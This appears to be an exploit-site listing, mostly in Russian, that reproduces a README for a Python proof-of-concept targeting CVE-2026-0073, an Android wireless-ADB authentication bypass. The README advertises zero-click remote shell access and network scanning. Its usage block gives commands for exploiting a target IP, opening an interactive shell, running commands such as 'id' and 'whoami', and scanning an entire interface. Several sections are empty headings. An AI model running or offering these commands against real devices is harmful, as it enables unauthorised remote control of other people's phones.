Sploitus

Exploit Code

MARKDOWN74 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TC4DY-CVE-2026-0073-POC-EXPLOIT
![CVE-2026-0073](https://assets.kitploit.com/production/public/readmes/33280/c133a777625ddd83cdb7b04d989a860cfea2a4761e1510e402cb4eb2a2b030ed.png)

# 🔓 CVE-2026-0073 - Обход аутентификации беспроводной отладки ADB в Android

![Python](https://img.shields.io/badge/Python-3.8+-blue.svg) ![CVSS](https://img.shields.io/badge/CVSS-8.8%20HIGH-red.svg) ![License](https://img.shields.io/badge/License-MIT-green.svg) ![Educational](https://img.shields.io/badge/Purpose-Educational%20Only-yellow.svg)

> **Zero-Click | Удалённая оболочка | Сетевой сканер | Образовательный инструмент для исследований в области безопасности**

* * *

## 🎯 Обзор

CVE-2026-0073 — критическая уязвимость обхода аутентификации в ADB-демоне Android, затрагивающая **беспроводную отладку** на устройствах Android 11 и новее. Ошибка находится в логике проверки TLS-сертификатов, где путаница типов в `EVP_PKEY_cmp()` позволяет злоумышленникам обойти аутентификацию, предъявив сертификат **EC P-256** или **Ed25519** устройству, настроенному с RSA-ключом.

Этот PoC демонстрирует уязвимость **только в целях авторизованных исследований безопасности и обучения.**

* * *

## ✨ Возможности

* * *

## 📱 Затронутые версии

Версия Android| Затронута  
---|---  
Android 14| ✅ Да  
Android 15| ✅ Да  
Android 16| ✅ Да  
Android 13-| ❌ Нет  
  
**Патч:** Android Security Bulletin 2026-05-01

* * *

## 📦 Установка

## 🚀 Примеры использования

root@kitploit:~
    
    
    #Basic - One Shot Exploit
    python exploit.py --target 192.168.1.100
    
    #Interactive Shell
    python exploit.py -t 192.168.1.100 -i
    
    #Execute Single Command
    python exploit.py -t 192.168.1.100 -c "id" -o result.txt
    
    #Scan Entire Network
    python exploit.py --scan --interface eth0
    
    #Manual Port + Verbose
    python exploit.py -t 192.168.1.100 -p 39311 -v
    
    #Ed25519 Certificate
    python exploit.py -t 192.168.1.100 --key-type ed25519
    
    #Non-Interactive Mode (Exit After Command)
    python exploit.py -t 192.168.1.100 -c "whoami" --no-interactive
    

## ⚙️ Аргументы командной строки

## 🔗 Связанные эксплойты

Ознакомьтесь с другими моими репозиториями эксплойтов:

  * CVE-2026-41940
  * CVE-2026-0024061
  * CVE-2026-29000